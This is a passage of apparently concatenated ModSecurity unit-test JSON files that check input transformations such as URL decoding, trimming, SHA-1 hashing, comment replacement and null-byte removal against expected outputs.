\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff" }, { "output" : " \\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f \\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff", "input" : "+%u1100%u1101%u1102%u1103%u1104%u1105%u1106%u1107%u1108%u1109%u110a%u110b%u110c%u110d%u110e%u110f%u1110%u1111%u1112%u1113%u1114%u1115%u1116%u1117%u1118%u1119%u111a%u111b%u111c%u111d%u111e%u111f%u1120%u1121%u1122%u1123%u1124%u1125%u1126%u1127%u1128%u1129%u112a%u112b%u112c%u112d%u112e%u112f%u1130%u1131%u1132%u1133%u1134%u1135%u1136%u1137%u1138%u1139%u113a%u113b%u113c%u113d%u113e%u113f%u1140%u1141%u1142%u1143%u1144%u1145%u1146%u1147%u1148%u1149%u114a%u114b%u114c%u114d%u114e%u114f%u1150%u1151%u1152%u1153%u1154%u1155%u1156%u1157%u1158%u1159%u115a%u115b%u115c%u115d%u115e%u115f%u1160%u1161%u1162%u1163%u1164%u1165%u1166%u1167%u1168%u1169%u116a%u116b%u116c%u116d%u116e%u116f%u1170%u1171%u1172%u1173%u1174%u1175%u1176%u1177%u1178%u1179%u117a%u117b%u117c%u117d%u117e%u117f%u1180%u1181%u1182%u1183%u1184%u1185%u1186%u1187%u1188%u1189%u118a%u118b%u118c%u118d%u118e%u118f%u1190%u1191%u1192%u1193%u1194%u1195%u1196%u1197%u1198%u1199%u119a%u119b%u119c%u119d%u119e%u119f%u11a0%u11a1%u11a2%u11a3%u11a4%u11a5%u11a6%u11a7%u11a8%u11a9%u11aa%u11ab%u11ac%u11ad%u11ae%u11af%u11b0%u11b1%u11b2%u11b3%u11b4%u11b5%u11b6%u11b7%u11b8%u11b9%u11ba%u11bb%u11bc%u11bd%u11be%u11bf%u11c0%u11c1%u11c2%u11c3%u11c4%u11c5%u11c6%u11c7%u11c8%u11c9%u11ca%u11cb%u11cc%u11cd%u11ce%u11cf%u11d0%u11d1%u11d2%u11d3%u11d4%u11d5%u11d6%u11d7%u11d8%u11d9%u11da%u11db%u11dc%u11dd%u11de%u11df%u11e0%u11e1%u11e2%u11e3%u11e4%u11e5%u11e6%u11e7%u11e8%u11e9%u11ea%u11eb%u11ec%u11ed%u11ee%u11ef%u11f0%u11f1%u11f2%u11f3%u11f4%u11f5%u11f6%u11f7%u11f8%u11f9%u11fa%u11fb%u11fc%u11fd%u11fe%u11ff", "type" : "tfn", "name" : "urlDecodeUni", "ret" : 1 }, { "input" : "%uff01%uff02%uff03%uff04%uff05%uff06%uff07%uff08%uff09%uff0a%uff0b%uff0c%uff0d%uff0e%uff0f%uff10%uff11%uff12%uff13%uff14%uff15%uff16%uff17%uff18%uff19%uff1a%uff1b%uff1c%uff1d%uff1e%uff1f%uff20%uff21%uff22%uff23%uff24%uff25%uff26%uff27%uff28%uff29%uff2a%uff2b%uff2c%uff2d%uff2e%uff2f%uff30%uff31%uff32%uff33%uff34%uff35%uff36%uff37%uff38%uff39%uff3a%uff3b%uff3c%uff3d%uff3e%uff3f%uff40%uff41%uff42%uff43%uff44%uff45%uff46%uff47%uff48%uff49%uff4a%uff4b%uff4c%uff4d%uff4e%uff4f%uff50%uff51%uff52%uff53%uff54%uff55%uff56%uff57%uff58%uff59%uff5a%uff5b%uff5c%uff5d%uff5e", "name" : "urlDecodeUni", "type" : "tfn", "ret" : 1, "output" : "\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e" }, { "name" : "urlDecodeUni", "input" : "%uff00%uff7f%uff80%uff81%uff82%uff83%uff84%uff85%uff86%uff87%uff88%uff89%uff8a%uff8b%uff8c%uff8d%uff8e%uff8f%uff90%uff91%uff92%uff93%uff94%uff95%uff96%uff97%uff98%uff99%uff9a%uff9b%uff9c%uff9d%uff9e%uff9f%uffa0%uffa1%uffa2%uffa3%uffa4%uffa5%uffa6%uffa7%uffa8%uffa9%uffaa%uffab%uffac%uffad%uffae%uffaf%uffb0%uffb1%uffb2%uffb3%uffb4%uffb5%uffb6%uffb7%uffb8%uffb9%uffba%uffbb%uffbc%uffbd%uffbe%uffbf%uffc0%uffc1%uffc2%uffc3%uffc4%uffc5%uffc6%uffc7%uffc8%uffc9%uffca%uffcb%uffcc%uffcd%uffce%uffcf%uffd0%uffd1%uffd2%uffd3%uffd4%uffd5%uffd6%uffd7%uffd8%uffd9%uffda%uffdb%uffdc%uffdd%uffde%uffdf%uffe0%uffe1%uffe2%uffe3%uffe4%uffe5%uffe6%uffe7%uffe8%uffe9%uffea%uffeb%uffec%uffed%uffee%uffef%ufff0%ufff1%ufff2%ufff3%ufff4%ufff5%ufff6%ufff7%ufff8%ufff9%ufffa%ufffb%ufffc%ufffd%ufffe%uffff", "type" : "tfn", "ret" : 1, "output" : "\\x00\\x7f\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff" }, { "output" : "% ", "input" : "%+", "type" : "tfn", "name" : "urlDecodeUni", "ret" : 1 }, { "output" : "% ", "name" : "urlDecodeUni", "input" : "%%20", "type" : "tfn", "ret" : 1 }, { "output" : "%0g ", "input" : "%0g%20", "name" : "urlDecodeUni", "type" : "tfn", "ret" : 1 }, { "output" : "%0 ", "ret" : 1, "input" : "%0%20", "type" : "tfn", "name" : "urlDecodeUni" }, { "output" : "%g0 ", "ret" : 1, "input" : "%g0%20", "type" : "tfn", "name" : "urlDecodeUni" }, { "input" : "%g%20", "name" : "urlDecodeUni", "type" : "tfn", "ret" : 1, "output" : "%g " }, { "output" : "% ", "type" : "tfn", "input" : "%%u0020", "name" : "urlDecodeUni", "ret" : 1 }, { "output" : "%0g ", "input" : "%0g%u0020", "type" : "tfn", "name" : "urlDecodeUni", "ret" : 1 }, { "type" : "tfn", "input" : "%0%u0020", "name" : "urlDecodeUni", "ret" : 1, "output" : "%0 " }, { "ret" : 1, "input" : "%g0%u0020", "type" : "tfn", "name" : "urlDecodeUni", "output" : "%g0 " }, { "output" : "%u ", "ret" : 1, "input" : "%u%u0020", "type" : "tfn", "name" : "urlDecodeUni" }, { "type" : "tfn", "input" : "%u0%u0020", "name" : "urlDecodeUni", "ret" : 1, "output" : "%u0 " }, { "output" : "%u00 ", "input" : "%u00%u0020", "name" : "urlDecodeUni", "type" : "tfn", "ret" : 1 }, { "ret" : 1, "name" : "urlDecodeUni", "input" : "%u000%u0020", "type" : "tfn", "output" : "%u000 " }, { "ret" : 1, "name" : "urlDecodeUni", "input" : "%u000g%u0020", "type" : "tfn", "output" : "%u000g " }, { "type" : "tfn", "input" : "%0%1%2%3%4%5%6%7%8%9%0%a%b%c%d%e%f", "name" : "urlDecodeUni", "ret" : 0, "output" : "%0%1%2%3%4%5%6%7%8%9%0%a%b%c%d%e%f" }, { "output" : "%g0%g1%g2%g3%g4%g5%g6%g7%g8%g9%g0%ga%gb%gc%gd%ge%gf", "name" : "urlDecodeUni", "input" : "%g0%g1%g2%g3%g4%g5%g6%g7%g8%g9%g0%ga%gb%gc%gd%ge%gf", "type" : "tfn", "ret" : 0 }, { "output" : "%0g%1g%2g%3g%4g%5g%6g%7g%8g%9g%0g%ag%bg%cg%dg%eg%fg", "input" : "%0g%1g%2g%3g%4g%5g%6g%7g%8g%9g%0g%ag%bg%cg%dg%eg%fg", "name" : "urlDecodeUni", "type" : "tfn", "ret" : 0 }, { "ret" : 0, "input" : "%", "type" : "tfn", "name" : "urlDecodeUni", "output" : "%" }, { "output" : "%0", "ret" : 0, "input" : "%0", "type" : "tfn", "name" : "urlDecodeUni" }, { "ret" : 0, "input" : "%%", "name" : "urlDecodeUni", "type" : "tfn", "output" : "%%" }, { "type" : "tfn", "input" : "%0g", "name" : "urlDecodeUni", "ret" : 0, "output" : "%0g" }, { "input" : "%gg", "name" : "urlDecodeUni", "type" : "tfn", "ret" : 0, "output" : "%gg" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/urlDecode.json0000644000175000017500000001112513607066311032342 0ustar zimmerlezimmerle[ { "output" : "", "type" : "tfn", "input" : "", "name" : "urlDecode", "ret" : 0 }, { "input" : "TestCase", "name" : "urlDecode", "type" : "tfn", "ret" : 0, "output" : "TestCase" }, { "name" : "urlDecode", "input" : "Test\u0000Case", "type" : "tfn", "ret" : 0, "output" : "Test\u0000Case" }, { "type" : "tfn", "input" : "+%00%01%02%03%04%05%06%07%08%09%0a%0b%0c%0d%0e%0f%10%11%12%13%14%15%16%17%18%19%1a%1b%1c%1d%1e%1f%20%21%22%23%24%25%26%27%28%29%2a%2b%2c%2d%2e%2f%30%31%32%33%34%35%36%37%38%39%3a%3b%3c%3d%3e%3f%40%41%42%43%44%45%46%47%48%49%4a%4b%4c%4d%4e%4f%50%51%52%53%54%55%56%57%58%59%5a%5b%5c%5d%5e%5f%60%61%62%63%64%65%66%67%68%69%6a%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%79%7a%7b%7c%7d%7e%7f%80%81%82%83%84%85%86%87%88%89%8a%8b%8c%8d%8e%8f%90%91%92%93%94%95%96%97%98%99%9a%9b%9c%9d%9e%9f%a0%a1%a2%a3%a4%a5%a6%a7%a8%a9%aa%ab%ac%ad%ae%af%b0%b1%b2%b3%b4%b5%b6%b7%b8%b9%ba%bb%bc%bd%be%bf%c0%c1%c2%c3%c4%c5%c6%c7%c8%c9%ca%cb%cc%cd%ce%cf%d0%d1%d2%d3%d4%d5%d6%d7%d8%d9%da%db%dc%dd%de%df%e0%e1%e2%e3%e4%e5%e6%e7%e8%e9%ea%eb%ec%ed%ee%ef%f0%f1%f2%f3%f4%f5%f6%f7%f8%f9%fa%fb%fc%fd%fe%ff", "name" : "urlDecode", "ret" : 1, "output" : " \\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f \\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff" }, { "output" : "Test Case", "name" : "urlDecode", "input" : "Test+Case", "type" : "tfn", "ret" : 1 }, { "output" : "% ", "ret" : 1, "name" : "urlDecode", "input" : "%+", "type" : "tfn" }, { "ret" : 1, "input" : "%%20", "type" : "tfn", "name" : "urlDecode", "output" : "% " }, { "input" : "%0g%20", "name" : "urlDecode", "type" : "tfn", "ret" : 1, "output" : "%0g " }, { "output" : "%0 ", "input" : "%0%20", "type" : "tfn", "name" : "urlDecode", "ret" : 1 }, { "ret" : 1, "input" : "%g0%20", "type" : "tfn", "name" : "urlDecode", "output" : "%g0 " }, { "output" : "%g ", "ret" : 1, "name" : "urlDecode", "input" : "%g%20", "type" : "tfn" }, { "output" : "%0%1%2%3%4%5%6%7%8%9%0%a%b%c%d%e%f", "input" : "%0%1%2%3%4%5%6%7%8%9%0%a%b%c%d%e%f", "type" : "tfn", "name" : "urlDecode", "ret" : 0 }, { "output" : "%g0%g1%g2%g3%g4%g5%g6%g7%g8%g9%g0%ga%gb%gc%gd%ge%gf", "ret" : 0, "name" : "urlDecode", "input" : "%g0%g1%g2%g3%g4%g5%g6%g7%g8%g9%g0%ga%gb%gc%gd%ge%gf", "type" : "tfn" }, { "output" : "%0g%1g%2g%3g%4g%5g%6g%7g%8g%9g%0g%ag%bg%cg%dg%eg%fg", "type" : "tfn", "input" : "%0g%1g%2g%3g%4g%5g%6g%7g%8g%9g%0g%ag%bg%cg%dg%eg%fg", "name" : "urlDecode", "ret" : 0 }, { "ret" : 0, "type" : "tfn", "input" : "%", "name" : "urlDecode", "output" : "%" }, { "output" : "%0", "ret" : 0, "name" : "urlDecode", "input" : "%0", "type" : "tfn" }, { "output" : "%%", "ret" : 0, "name" : "urlDecode", "input" : "%%", "type" : "tfn" }, { "output" : "%0g", "ret" : 0, "input" : "%0g", "type" : "tfn", "name" : "urlDecode" }, { "input" : "%gg", "name" : "urlDecode", "type" : "tfn", "ret" : 0, "output" : "%gg" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/trimRight.json0000644000175000017500000000246113607066311032410 0ustar zimmerlezimmerle[ { "output" : "", "type" : "tfn", "input" : "", "name" : "trimRight", "ret" : 0 }, { "ret" : 0, "input" : "TestCase", "name" : "trimRight", "type" : "tfn", "output" : "TestCase" }, { "input" : "Test\\u0000Case", "type" : "tfn", "name" : "trimRight", "ret" : 0, "output" : "Test\\u0000Case" }, { "output" : " TestCase", "ret" : 0, "input" : " TestCase", "type" : "tfn", "name" : "trimRight" }, { "input" : "TestCase ", "type" : "tfn", "name" : "trimRight", "ret" : 1, "output" : "TestCase" }, { "output" : " TestCase", "input" : " TestCase ", "type" : "tfn", "name" : "trimRight", "ret" : 1 }, { "output" : " Test Case", "ret" : 1, "name" : "trimRight", "input" : " Test Case ", "type" : "tfn" }, { "ret" : 1, "input" : " Test \\u0000 Case ", "name" : "trimRight", "type" : "tfn", "output" : " Test \\u0000 Case" }, { "name" : "trimRight", "input" : " \t Test12 \\u0000 Case \t \t \r\n ", "type" : "tfn", "ret" : 1, "output" : " \t Test12 \\u0000 Case" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/trimLeft.json0000644000175000017500000000245013607066311032223 0ustar zimmerlezimmerle[ { "type" : "tfn", "input" : "", "name" : "trimLeft", "ret" : 0, "output" : "" }, { "input" : "TestCase", "type" : "tfn", "name" : "trimLeft", "ret" : 0, "output" : "TestCase" }, { "name" : "trimLeft", "input" : "Test\u0000Case", "type" : "tfn", "ret" : 0, "output" : "Test\u0000Case" }, { "ret" : 0, "type" : "tfn", "input" : "TestCase ", "name" : "trimLeft", "output" : "TestCase " }, { "ret" : 1, "input" : " TestCase", "name" : "trimLeft", "type" : "tfn", "output" : "TestCase" }, { "output" : "TestCase ", "name" : "trimLeft", "input" : " TestCase ", "type" : "tfn", "ret" : 1 }, { "output" : "Test Case ", "ret" : 1, "input" : " Test Case ", "type" : "tfn", "name" : "trimLeft" }, { "input" : " Test \u0000 Case ", "name" : "trimLeft", "type" : "tfn", "ret" : 1, "output" : "Test \u0000 Case " }, { "ret" : 1, "type" : "tfn", "input" : " \t Test \u0000 Case \t \t \r\n ", "name" : "trimLeft", "output" : "Test \u0000 Case \t \t \r\n " } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/trim.json0000644000175000017500000000235013607066311031407 0ustar zimmerlezimmerle[ { "ret" : 0, "type" : "tfn", "input" : "", "name" : "trim", "output" : "" }, { "input" : "TestCase", "name" : "trim", "type" : "tfn", "ret" : 0, "output" : "TestCase" }, { "ret" : 0, "input" : "Test\u0000Case", "type" : "tfn", "name" : "trim", "output" : "Test\u0000Case" }, { "output" : "TestCase", "input" : " TestCase", "name" : "trim", "type" : "tfn", "ret" : 1 }, { "output" : "TestCase", "ret" : 1, "name" : "trim", "input" : "TestCase ", "type" : "tfn" }, { "output" : "TestCase", "ret" : 1, "name" : "trim", "input" : " TestCase ", "type" : "tfn" }, { "output" : "Test Case", "type" : "tfn", "input" : " Test Case ", "name" : "trim", "ret" : 1 }, { "name" : "trim", "input" : " Test \\u0000 Case ", "type" : "tfn", "ret" : 1, "output" : "Test \\u0000 Case" }, { "input" : " \t Test \\u0000 Case \t \t \r\n ", "name" : "trim", "type" : "tfn", "ret" : 1, "output" : "Test \\u0000 Case" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/sqlHexDecode.json0000644000175000017500000000020713607066311033003 0ustar zimmerlezimmerle[ { "ret" : 1, "input" : "0x414243", "type" : "tfn", "name" : "sqlHexDecode", "output" : "ABC" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/sha1.json0000644000175000017500000000126713607066311031276 0ustar zimmerlezimmerle[ { "type" : "tfn", "input" : "", "name" : "sha1", "ret" : 1, "output" : "\\xda\\x39\\xa3\\xee\\x5e\\x6b\\x4b\\x0d\\x32\\x55\\xbf\\xef\\x95\\x60\\x18\\x90\\xaf\\xd8\\x07\\x09" }, { "type" : "tfn", "input" : "TestCase", "name" : "sha1", "ret" : 1, "output" : "\\xa7\\x0c\\xe3\\x83\\x89\\xe3\\x18\\xbd\\x2b\\xe1\\x8a\\x01\\x11\\xc6\\xdc\\x76\\xbd\\x2c\\xd9\\xed" }, { "type" : "tfn", "input" : "\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08", "name" : "sha1", "ret" : 1, "output" : "\\x63\\xbf\\x60\\xc7\\x10\\x5a\\x07\\xa2\\xb1\\x25\\xbb\\xf8\\x9e\\x61\\xab\\xda\\xbc\\x69\\x78\\xc2" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/replaceNulls.json0000644000175000017500000000176213607066311033073 0ustar zimmerlezimmerle[ { "output" : "", "name" : "replaceNulls", "input" : "", "type" : "tfn", "ret" : 0 }, { "input" : "TestCase", "name" : "replaceNulls", "type" : "tfn", "ret" : 0, "output" : "TestCase" }, { "output" : " TestCase", "name" : "replaceNulls", "input" : "\\u0000TestCase", "type" : "tfn", "ret" : 1 }, { "output" : "Test Case", "ret" : 1, "input" : "Test\\u0000Case", "name" : "replaceNulls", "type" : "tfn" }, { "input" : "Test\\u0000\\u0000Case", "type" : "tfn", "name" : "replaceNulls", "ret" : 1, "output" : "Test Case" }, { "ret" : 1, "name" : "replaceNulls", "input" : "TestCase\\u0000", "type" : "tfn", "output" : "TestCase " }, { "output" : " Test Case ", "name" : "replaceNulls", "input" : "\\u0000Test\\u0000Case\\u0000", "type" : "tfn", "ret" : 1 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/replaceComments.json0000644000175000017500000000607213607066311033562 0ustar zimmerlezimmerle[ { "output" : "", "input" : "", "type" : "tfn", "name" : "replaceComments", "ret" : 0 }, { "input" : "TestCase", "type" : "tfn", "name" : "replaceComments", "ret" : 0, "output" : "TestCase" }, { "ret" : 0, "input" : "Test\\u0000Case", "name" : "replaceComments", "type" : "tfn", "output" : "Test\\u0000Case" }, { "ret" : 1, "input" : "/* TestCase */", "name" : "replaceComments", "type" : "tfn", "output" : " " }, { "output" : " ", "ret" : 1, "type" : "tfn", "input" : "/*TestCase*/", "name" : "replaceComments" }, { "input" : "/* TestCase*/", "type" : "tfn", "name" : "replaceComments", "ret" : 1, "output" : " " }, { "output" : " ", "ret" : 1, "name" : "replaceComments", "input" : "/*TestCase */", "type" : "tfn" }, { "output" : "Before After", "ret" : 1, "type" : "tfn", "input" : "Before/* TestCase */After", "name" : "replaceComments" }, { "output" : "Before After", "name" : "replaceComments", "input" : "Before /* TestCase */ After", "type" : "tfn", "ret" : 1 }, { "type" : "tfn", "input" : "/* Test\\nCase */", "name" : "replaceComments", "ret" : 1, "output" : " " }, { "name" : "replaceComments", "input" : "/* Test\r\nCase */", "type" : "tfn", "ret" : 1, "output" : " " }, { "ret" : 1, "input" : "/* Test\nCase */", "type" : "tfn", "name" : "replaceComments", "output" : " " }, { "ret" : 1, "name" : "replaceComments", "input" : "/* Test\rCase */", "type" : "tfn", "output" : " " }, { "ret" : 1, "input" : "Before/* Test\r\nCase ", "type" : "tfn", "name" : "replaceComments", "output" : "Before " }, { "output" : "Before ", "input" : "Before /* Test\nCase ", "type" : "tfn", "name" : "replaceComments", "ret" : 1 }, { "output" : "Before ", "ret" : 1, "input" : "Before/* Test\r\nCase ", "name" : "replaceComments", "type" : "tfn" }, { "input" : "Before /* Test\nCase ", "name" : "replaceComments", "type" : "tfn", "ret" : 1, "output" : "Before " }, { "ret" : 0, "name" : "replaceComments", "input" : "Test\r\nCase */After", "type" : "tfn", "output" : "Test\r\nCase */After" }, { "output" : "Test\nCase */ After", "name" : "replaceComments", "input" : "Test\nCase */ After", "type" : "tfn", "ret" : 0 }, { "output" : "Test\r\nCase */After", "ret" : 0, "name" : "replaceComments", "input" : "Test\r\nCase */After", "type" : "tfn" }, { "input" : "Test\nCase */ After", "name" : "replaceComments", "type" : "tfn", "ret" : 0, "output" : "Test\nCase */ After" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/removeWhitespace.json0000644000175000017500000000163213607066311033750 0ustar zimmerlezimmerle[ { "output" : "", "input" : "", "type" : "tfn", "name" : "removeWhitespace", "ret" : 0 }, { "output" : "TestCase", "ret" : 0, "name" : "removeWhitespace", "input" : "TestCase", "type" : "tfn" }, { "ret" : 0, "input" : "Test\u0000Case", "name" : "removeWhitespace", "type" : "tfn", "output" : "Test\u0000Case" }, { "output" : "TestCase", "name" : "removeWhitespace", "input" : " Test \t Case ", "type" : "tfn", "ret" : 1 }, { "input" : "This is a test case with a tab \t, vtab \u000b, newline \n, return \r, formfeed \f, and a NUL\u0000 in it with a CRLF at the end.\r\n", "type" : "tfn", "name" : "removeWhitespace", "ret" : 1, "output" : "Thisisatestcasewithatab,vtab,newline,return,formfeed,andaNUL\u0000initwithaCRLFattheend." } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/removeNulls.json0000644000175000017500000000215113607066311032746 0ustar zimmerlezimmerle[ { "input" : "", "type" : "tfn", "name" : "removeNulls", "ret" : 0, "output" : "" }, { "ret" : 0, "input" : "TestCase", "type" : "tfn", "name" : "removeNulls", "output" : "TestCase" }, { "output" : "Test\\u0001Case", "input" : "Test\\u0001Case", "type" : "tfn", "name" : "removeNulls", "ret" : 0 }, { "input" : "\\x00TestCase", "type" : "tfn", "name" : "removeNulls", "ret" : 1, "output" : "TestCase" }, { "output" : "TestCase", "ret" : 1, "input" : "Test\\x00Case", "name" : "removeNulls", "type" : "tfn" }, { "input" : "Test\\x00\\x00Case", "type" : "tfn", "name" : "removeNulls", "ret" : 1, "output" : "TestCase" }, { "output" : "TestCase", "ret" : 1, "input" : "TestCase\\x00", "name" : "removeNulls", "type" : "tfn" }, { 